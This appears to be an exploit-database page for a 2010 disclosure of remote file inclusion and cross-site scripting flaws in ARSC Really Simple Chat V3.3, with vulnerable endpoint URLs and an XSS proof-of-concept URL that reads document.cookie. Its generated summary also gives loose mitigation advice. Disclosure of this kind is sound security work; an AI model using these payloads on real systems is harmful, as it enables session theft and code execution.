header-logo
Suggest Exploit
vendor:
ARSC Really Simple Chat
by:
Zer0 Thunder
7,5
CVSS
HIGH
Remote File Inclusion & Cross Site Scripting
94, 79
CWE
Product Name: ARSC Really Simple Chat
Affected Version From: V3.3
Affected Version To: V3.3
Patch Exists: NO
Related CWE: N/A
CPE: a:arsc:arsc_really_simple_chat:3.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

ARSC Really Simple Chat V3.3 Remote File Inclsion & Cross Site Scripting Vulnerability

A Remote File Inclusion (RFI) vulnerability exists in ARSC Really Simple Chat V3.3. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow an attacker to execute arbitrary code on the vulnerable system. A Cross Site Scripting (XSS) vulnerability also exists in ARSC Really Simple Chat V3.3. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

To mitigate the risk of RFI and XSS attacks, input validation should be performed on all user-supplied data. Additionally, the application should be configured to use a secure transport layer such as TLS/SSL.
Source

Exploit-DB raw data:

=> ARSC Really Simple Chat V3.3 Remote File Inclsion & Cross Site Scripting Vulnerability
=> Author	: Zer0 Thunder
=> Home		: http://colombohackers.com
=> Download	: http://sourceforge.net/projects/arsc/
=> Date 	: 06/25/2010


Remote File Inclusion
---

http://localhost/arsc3.3-pre2/base/dereferer.php?arsc_link=[RFI]


XSS Call
--------

http://localhost/arsc3.3-pre2/base/admin/login.php?arsc_message=[XSS]


Example :
http://localhost/arsc3.3-pre2/base/admin/login.php?arsc_message=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Navigation

Suggest Exploit

Services By CQR